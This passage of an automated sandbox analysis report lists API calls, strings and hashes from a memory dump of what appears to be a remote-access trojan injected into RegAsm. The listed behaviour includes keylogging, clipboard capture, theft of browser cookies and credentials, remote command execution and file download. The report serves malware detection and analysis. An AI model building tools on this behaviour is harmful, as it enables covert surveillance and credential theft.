              • Instruction Fuzzy Hash: 7B1184B2BC021473D419313E5DABBBE28029743B51F94416BF6123A6C6E8DF0A8102CF
              APIs
              • _wcslen.LIBCMT ref: 004162F5
                • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                • Part of subcall function 00413877: RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004), ref: 004138A0
                • Part of subcall function 00413877: RegCloseKey.KERNEL32(004660A4), ref: 004138AB
                • Part of subcall function 00409DE4: _wcslen.LIBCMT ref: 00409DFD
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: _wcslen$CloseCreateValue
              • String ID: !D@$okmode$PG
              • API String ID: 3411444782-3370592832
              • Opcode ID: 56d367afe2ba597d6a39c7afb1f52fa5ab03872d574dd40714d897b86eaaf0d3
              • Instruction ID: dff749dc984b923ba5de2327a6f3f9cc2e67bcaf748228c26ce3aec7d70e92d7
              • Opcode Fuzzy Hash: 56d367afe2ba597d6a39c7afb1f52fa5ab03872d574dd40714d897b86eaaf0d3
              • Instruction Fuzzy Hash: 10119371B442011ADB187B72D832ABD22969F94358F80443FF54AAF2E2DEBD4C51525D
              APIs
                • Part of subcall function 0040C4C3: PathFileExistsW.SHLWAPI(00000000), ref: 0040C4F6
              • PathFileExistsW.SHLWAPI(00000000), ref: 0040C61D
              • PathFileExistsW.SHLWAPI(00000000), ref: 0040C688
              Strings
              • User Data\Profile ?\Network\Cookies, xrefs: 0040C635
              • User Data\Default\Network\Cookies, xrefs: 0040C603
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: ExistsFilePath
              • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
              • API String ID: 1174141254-1980882731
              • Opcode ID: f3bc938036da248068b0be9c9c2ef6302554ca2f51a2acae7b142117e121394f
              • Instruction ID: e6b9b9a8142aca5ff9e4641a3ff80a721fb4b0471daa7637ae592fad8ebd6223
              • Opcode Fuzzy Hash: f3bc938036da248068b0be9c9c2ef6302554ca2f51a2acae7b142117e121394f
              • Instruction Fuzzy Hash: B421037190011996CB14F7A2DC96CEEB738EE50319F40053FB502B31D2EF789A46C698
              APIs
                • Part of subcall function 0040C526: PathFileExistsW.SHLWAPI(00000000), ref: 0040C559
              • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6EC
              • PathFileExistsW.SHLWAPI(00000000), ref: 0040C757
              Strings
              • User Data\Profile ?\Network\Cookies, xrefs: 0040C704
              • User Data\Default\Network\Cookies, xrefs: 0040C6D2
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: ExistsFilePath
              • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
              • API String ID: 1174141254-1980882731
              • Opcode ID: cddf59ed0f0a35ae698fc10c37901bb26126bcec9028eb75e0275fc853fc9b73
              • Instruction ID: 83f6a23093d6b0727a30a1d550f3d6f5bdb2bb72864fa742cd8a9fd6423befd9
              • Opcode Fuzzy Hash: cddf59ed0f0a35ae698fc10c37901bb26126bcec9028eb75e0275fc853fc9b73
              • Instruction Fuzzy Hash: AE21D37190011AD6CB05F7A2DC96CEEB778EE50719B50013FF502B31D2EF789A46C698
              APIs
              • GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
              • wsprintfW.USER32 ref: 0040B1F3
                • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,?,0040B82F,?,?,?,?,?,00000000), ref: 0040A662
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: EventLocalTimewsprintf
              • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
              • API String ID: 1497725170-1359877963
              • Opcode ID: c8cd868dd362bd9616f6924cb695c27546a7cf7ec47136230a452d94a8988757
              • Instruction ID: 81b60f5d3581edaaac31e3e44e1e4f5c322996b2d8bf5e7d6f89c643b346fb92
              • Opcode Fuzzy Hash: c8cd868dd362bd9616f6924cb695c27546a7cf7ec47136230a452d94a8988757
              • Instruction Fuzzy Hash: 82117F72504118AACB18AB96EC558FE77BCEE48315B00012FF506A60E1FF7C9E46C6AC
              APIs
                • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
              • CreateThread.KERNEL32(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 0040AF6E
              • CreateThread.KERNEL32(00000000,00000000,Function_0000A289,?,00000000,00000000), ref: 0040AF7A
              • CreateThread.KERNEL32(00000000,00000000,0040A295,?,00000000,00000000), ref: 0040AF86
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: CreateThread$LocalTime$wsprintf
              • String ID: Online Keylogger Started
              • API String ID: 112202259-1258561607
              • Opcode ID: 958200284c2bea51d202cfda8ca6d09af1b0fae5d8a7627b3d8146febcef491d
              • Instruction ID: a86b307176fed80e65d2d8085b20e14cf0e56bf63d45b36b749a5edd9f3e52e0
              • Opcode Fuzzy Hash: 958200284c2bea51d202cfda8ca6d09af1b0fae5d8a7627b3d8146febcef491d
              • Instruction Fuzzy Hash: 1401C8A070031939E62076365C87D7F7A5DCA81398F40057FF645362C6D97D1C5586FB
              APIs
              • LoadLibraryA.KERNEL32(crypt32), ref: 00406A82
              • GetProcAddress.KERNEL32(00000000), ref: 00406A89
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: AddressLibraryLoadProc
              • String ID: CryptUnprotectData$crypt32
              • API String ID: 2574300362-2380590389
              • Opcode ID: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
              • Instruction ID: d796ed41fc96dc9ef8d801536240fab0e9422483ab40f89d2a564a4d0f07de08
              • Opcode Fuzzy Hash: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
              • Instruction Fuzzy Hash: 6201B535B00216ABCB18DFAD9D449ABBBB8EB49300F14817EE95AE3341D674D9008BA4
              APIs
              • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
              • CloseHandle.KERNEL32(?), ref: 004051CA
              • SetEvent.KERNEL32(?), ref: 004051D9
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: CloseEventHandleObjectSingleWait
              • String ID: Connection Timeout
              • API String ID: 2055531096-499159329
              • Opcode ID: 0fd579d592e0ec80786bd468370273e6dda72da4d01b044bfcfe4f18e9b09a20
              • Instruction ID: e4880b57ed2806ada623013920947221b56867654f576af2420d72dde76e11cf
              • Opcode Fuzzy Hash: 0fd579d592e0ec80786bd468370273e6dda72da4d01b044bfcfe4f18e9b09a20
              • Instruction Fuzzy Hash: 1201D831A40F40AFE7257B368D9552BBBE0FF01302704097FE68396AE2D6789800CF59
              APIs
              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E833
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Exception@8Throw
              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
              • API String ID: 2005118841-1866435925
              • Opcode ID: 14b47bc0c01e13b5246ea87e39f47a408aa5ce0847750dcdb3cc0488a1de7433
              • Instruction ID: aca7d9cae529c24a85643cb8f0975e7fdd15ab88b82278639a3f13e82648cb6f
              • Opcode Fuzzy Hash: 14b47bc0c01e13b5246ea87e39f47a408aa5ce0847750dcdb3cc0488a1de7433
              • Instruction Fuzzy Hash: 2C01B1315443086AE618F693C843FAA73585B10708F108C2FAA15761C2F67D6961C66B
              APIs
              • RegCreateKeyW.ADVAPI32(80000001,00000000,004752D8), ref: 0041381F
              • RegSetValueExW.ADVAPI32 ref: 0041384D
              • RegCloseKey.ADVAPI32(004752D8), ref: 00413858
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: CloseCreateValue
              • String ID: pth_unenc
              • API String ID: 1818849710-4028850238
              • Opcode ID: 0de8c57798d2a052ed48f9ba6d58c7c81afdedd1aa2e5c5a2a8de63742f16a74
              • Instruction ID: 91b44a8789fefabe47d0aed0b401f4e945a8dec35bb1902c17c37083bf943f80
              • Opcode Fuzzy Hash: 0de8c57798d2a052ed48f9ba6d58c7c81afdedd1aa2e5c5a2a8de63742f16a74
              • Instruction Fuzzy Hash: 83F0C271440218FBDF10AFA1EC45FEE376CEF00B56F10452AF905A61A1E7359F04DA94
              APIs
              • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFB1
              • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040DFF0
                • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 0043565F
                • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 00435683
              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E016
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
              • String ID: bad locale name
              • API String ID: 3628047217-1405518554
              • Opcode ID: 86f49e18a429e1939de4d1535c8c5fe7fe9a78163a93b43351c768af92284890
              • Instruction ID: c9d4814c50014869750c7e26a4e1a69426a580a77e14145940ab7c7d7e24a8db
              • Opcode Fuzzy Hash: 86f49e18a429e1939de4d1535c8c5fe7fe9a78163a93b43351c768af92284890
              • Instruction Fuzzy Hash: EAF081314006049AC634FA62D863B9AB7B89F14718F504A7FB906228D1EF7CBA1CCA4C
              APIs
              • CreateThread.KERNEL32(00000000,00000000,Function_0001D45D,00000000,00000000,00000000), ref: 00416C47
              • ShowWindow.USER32(00000009), ref: 00416C61
              • SetForegroundWindow.USER32 ref: 00416C6D
                • Part of subcall function 0041CD9B: AllocConsole.KERNEL32 ref: 0041CDA4
                • Part of subcall function 0041CD9B: ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                • Part of subcall function 0041CD9B: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Window$ConsoleShow$AllocCreateForegroundOutputThread
              • String ID: !D@
              • API String ID: 3446828153-604454484
              • Opcode ID: b7364eaafb7a437eec89ed9fb4143899ef50b32a2d873a0c8232afd7958e43d5
              • Instruction ID: c1d0571eb829819ca76672189d51ce116019f2d3a91c4b5ec781e9fa27a10d2f
              • Opcode Fuzzy Hash: b7364eaafb7a437eec89ed9fb4143899ef50b32a2d873a0c8232afd7958e43d5
              • Instruction Fuzzy Hash: 9EF05E70158201EAD720AB62EC45AFA7B69EB54351F00483BF849D14F2DB398C85C69D
              APIs
              • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00416130
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: ExecuteShell
              • String ID: /C $cmd.exe$open
              • API String ID: 587946157-3896048727
              • Opcode ID: 64774f0173dd2414335a6a01ca4130183aa4f4d30cf83fc1238f67c292a9c67a
              • Instruction ID: 0a18f3537a1213b4b5dca9b82f73c842755a7e35c30cee8a650de64661b344da
              • Opcode Fuzzy Hash: 64774f0173dd2414335a6a01ca4130183aa4f4d30cf83fc1238f67c292a9c67a
              • Instruction Fuzzy Hash: 0DE0C0B0208345AAC705E775CC95CBF73ADAA94749B50483F7142A20E2EF7C9D49C659
              APIs
              • TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
              • UnhookWindowsHookEx.USER32 ref: 0040B8C7
              • TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: TerminateThread$HookUnhookWindows
              • String ID: pth_unenc
              • API String ID: 3123878439-4028850238
              • Opcode ID: 507b53b63eb7c6f10faa5869e7b72cd95082fe0a88c6c54c261be3869f185826
              • Instruction ID: 1c21f009177841ea8acfe7f5b61a435624369701cc7e40c150536a334dec3301
              • Opcode Fuzzy Hash: 507b53b63eb7c6f10faa5869e7b72cd95082fe0a88c6c54c261be3869f185826
              • Instruction Fuzzy Hash: 4AE01272205356EFD7241FA09C988267BEEDA0478A324487EF2C3626B1CA794C10CB5D
              APIs
              • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
              • GetProcAddress.KERNEL32(00000000), ref: 0040141B
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: AddressHandleModuleProc
              • String ID: GetCursorInfo$User32.dll
              • API String ID: 1646373207-2714051624
              • Opcode ID: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
              • Instruction ID: 65f79b4a2c2aed896b4012a4b0ac893fb7d0ccba54e760513c8834f3bef68171
              • Opcode Fuzzy Hash: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
              • Instruction Fuzzy Hash: B4B09B70541740E7CB106BF45C4F9153555B514703B105476B44996151D7B44400C61E
              APIs
              • LoadLibraryA.KERNEL32(User32.dll), ref: 004014B9
              • GetProcAddress.KERNEL32(00000000), ref: 004014C0
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: AddressLibraryLoadProc
              • String ID: GetLastInputInfo$User32.dll
              • API String ID: 2574300362-1519888992
              • Opcode ID: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
              • Instruction ID: ea73ef4d1088e939c140d9431744cb36a9dcab52d5ea7f3e4bb33043e5d41cbe
              • Opcode Fuzzy Hash: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
              • Instruction Fuzzy Hash: 5EB092B45C1700FBCB106FA4AC4E9293AA9A614703B1088ABB845D2162EBB884008F9F
              APIs
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: __alldvrm$_strrchr
              • String ID:
              • API String ID: 1036877536-0
              • Opcode ID: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
              • Instruction ID: 0200e234d7a66e392568480c50467de0d06b46efb2a76a7ba0b74d69ca9a70f2
              • Opcode Fuzzy Hash: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
              • Instruction Fuzzy Hash: 57A166319843869FFB21CF58C8817AEBBA1FF25304F1441AFE9859B382C27D8951C75A
              APIs
              Strings
              • [Cleared browsers logins and cookies.], xrefs: 0040C0E4
              • Cleared browsers logins and cookies., xrefs: 0040C0F5
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Sleep
              • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
              • API String ID: 3472027048-1236744412
              • Opcode ID: f04c9fcfc5d51e830be94f028420677c48269f78a09cd2570410497d2b162b15
              • Instruction ID: fac43f66edf0589ccdcbb227709f1a337e776f7542e83b73a027453bfa593f46
              • Opcode Fuzzy Hash: f04c9fcfc5d51e830be94f028420677c48269f78a09cd2570410497d2b162b15
              • Instruction Fuzzy Hash: 2531C804348380E9D6116BF554567AB7B814E93744F08457FB9C42B3D3D97E4848C7AF
              APIs
                • Part of subcall function 0041C551: GetForegroundWindow.USER32 ref: 0041C561
                • Part of subcall function 0041C551: GetWindowTextLengthW.USER32 ref: 0041C56A
                • Part of subcall function 0041C551: GetWindowTextW.USER32 ref: 0041C594
              • Sleep.KERNEL32(000001F4), ref: 0040A573
              • Sleep.KERNEL32(00000064), ref: 0040A5FD
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Window$SleepText$ForegroundLength
              • String ID: [ $ ]
              • API String ID: 3309952895-93608704
              • Opcode ID: 31279ddc9ac779b407beafc78fb4a7c612abc736342ec11431a77cc1334fcb89
              • Instruction ID: 97bd403738d1ca0cb59e80c1fc79ee6201ed0cb329172f4776a94889a39aca56
              • Opcode Fuzzy Hash: 31279ddc9ac779b407beafc78fb4a7c612abc736342ec11431a77cc1334fcb89
              • Instruction Fuzzy Hash: FE119F315043006BC614BB65CC5399F77A8AF50308F40053FF552665E2FF79AA5886DB
              APIs
              • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
              • GetFileSize.KERNEL32(00000000,00000000), ref: 0041C4B2
              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C4D7
              • CloseHandle.KERNEL32(00000000), ref: 0041C4E5
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: File$CloseCreateHandleReadSize
              • String ID:
              • API String ID: 3919263394-0
              • Opcode ID: 3271d486463dfc93c477f1e2c7ad2cd28a4a76e92964f49fc02a4406d9477efd
              • Instruction ID: d938e931a51b81dfe9e25773ede9364464a286a3a3b97e7b856b7b87d8bf29b3
              • Opcode Fuzzy Hash: 3271d486463dfc93c477f1e2c7ad2cd28a4a76e92964f49fc02a4406d9477efd
              • Instruction Fuzzy Hash: 0FF0C2B1245308BFE6101B25ACD4EBB375CEB867A9F00053EF902A22C1CA298C05913A
              APIs
              • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
              • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
              • CloseHandle.KERNEL32(00000000), ref: 0041C233
              • CloseHandle.KERNEL32(00000000), ref: 0041C23B
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: CloseHandleOpenProcess
              • String ID:
              • API String ID: 39102293-0
              • Opcode ID: 449f4402ebb840a84195bd3231048093a1951801f3bdb5f0a33f363ac88d28a1
              • Instruction ID: 502f13a9e38f74389cb09c542eced9ec4ef47df168bad581006c654e14f0d55b
              • Opcode Fuzzy Hash: 449f4402ebb840a84195bd3231048093a1951801f3bdb5f0a33f363ac88d28a1
              • Instruction Fuzzy Hash: 53012BB1680315ABD61057D49C89FB7B27CDB84796F0000A7FA04D21D2EF748C818679
              APIs
              • ___BuildCatchObject.LIBVCRUNTIME ref: 0043987A
                • Part of subcall function 00439EB2: ___AdjustPointer.LIBCMT ref: 00439EFC
              • _UnwindNestedFrames.LIBCMT ref: 00439891
              • ___FrameUnwindToState.LIBVCRUNTIME ref: 004398A3
              • CallCatchBlock.LIBVCRUNTIME ref: 004398C7
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
              • String ID:
              • API String ID: 2633735394-0
              • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
              • Instruction ID: dcee73c62e3621a690853eebe59cad03ae51e1002f288686f44977c5109bb855
              • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
              • Instruction Fuzzy Hash: 18011732000109BBCF12AF55CC01EDA3BBAEF9D754F04511AFD5861221C3BAE861DBA5
              APIs
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: MetricsSystem
              • String ID:
              • API String ID: 4116985748-0
              • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
              • Instruction ID: 9a44d86f369c7068fc2c949f9b02ed5542bf43da40f6b7222f807aea32733f55
              • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
              • Instruction Fuzzy Hash: DFF0A471B043155BD744EA759C51A6F6BD5EBD4264F10043FF20887281EE78DC468785
              APIs
              • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438F31
              • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438F36
              • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438F3B
                • Part of subcall function 0043A43A: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A44B
              • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438F50
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
              • String ID:
              • API String ID: 1761009282-0
              • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
              • Instruction ID: 04dbcd9d80b8837b95b31ffc0e846904d80335f120ca5f78e3accc67d081205e
              • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
              • Instruction Fuzzy Hash: 59C04C15080781541C50B6B2210B2AE83461E7E38DFD074DFFCE0571038E4E043B653F
              APIs
              • __startOneArgErrorHandling.LIBCMT ref: 00442CED
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: ErrorHandling__start
              • String ID: pow
              • API String ID: 3213639722-2276729525
              • Opcode ID: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
              • Instruction ID: c2a334fe3ab53b67a82bc2a1da04863f7f1ed5e2a579c87dfbcc8ae8a095d349
              • Opcode Fuzzy Hash: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
              • Instruction Fuzzy Hash: C6516DA1E0420296FB167B14CE4137B2BA4DB40751F704D7FF096823AAEB7D8C859A4F
              APIs
                • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
              • __Init_thread_footer.LIBCMT ref: 0040B797
              Strings
              Similarity
              • API ID: Init_thread_footer__onexit
              • String ID: [End of clipboard]$[Text copied to clipboard]
              APIs
              • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451D92,?,00000050,?,?,?,?,?), ref: 00451C12
              Strings
              Similarity
              • API ID:
              • String ID: ACP$OCP
              APIs
              • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405030
                • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
              • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405087
              Strings
              • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
              Similarity
              • API ID: LocalTime
              • String ID: KeepAlive | Enabled | Timeout:
              APIs
              • Sleep.KERNEL32 ref: 00416640
              • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166A2
              Strings
              Similarity
              • API ID: DownloadFileSleep
              • String ID: !D@
              APIs
              • GetLocalTime.KERNEL32(00000000), ref: 0041B509
              Strings
              Similarity
              • API ID: LocalTime
              • String ID: | $%02i:%02i:%02i:%03i
              APIs
              • PathFileExistsW.SHLWAPI(00000000), ref: 0041AD3C
              Strings
              Similarity
              • API ID: ExistsFilePath
              • String ID: alarm.wav$hYG
              APIs
                • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
              • CloseHandle.KERNEL32(?), ref: 0040B0B4
              • UnhookWindowsHookEx.USER32 ref: 0040B0C7
              Strings
              Similarity
              • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
              • String ID: Online Keylogger Stopped
              APIs
              • waveInPrepareHeader.WINMM(?,00000020,?), ref: 00401849
              • waveInAddBuffer.WINMM(?,00000020), ref: 0040185F
              Strings
              Similarity
              • API ID: wave$BufferHeaderPrepare
              • String ID: XMG
              APIs
              • IsValidLocale.KERNEL32(00000000,JD,00000000,00000001,?,?,00444AEA,?,?,004444CA,?,00000004), ref: 00448B32
              Strings
              Similarity
              • API ID: LocaleValid
              • String ID: IsValidLocaleName$JD
              APIs
              • PathFileExistsW.SHLWAPI(00000000), ref: 0040C4F6
              Strings
              Similarity
              • API ID: ExistsFilePath
              • String ID: UserProfile$\AppData\Local\Google\Chrome\
              APIs
              • PathFileExistsW.SHLWAPI(00000000), ref: 0040C559
              Strings
              Similarity
              • API ID: ExistsFilePath
              • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
              APIs
              • PathFileExistsW.SHLWAPI(00000000), ref: 0040C5BC
              Strings
              Similarity
              • API ID: ExistsFilePath
              • String ID: AppData$\Opera Software\Opera Stable\
              APIs
              • GetKeyState.USER32(00000011), ref: 0040B64B
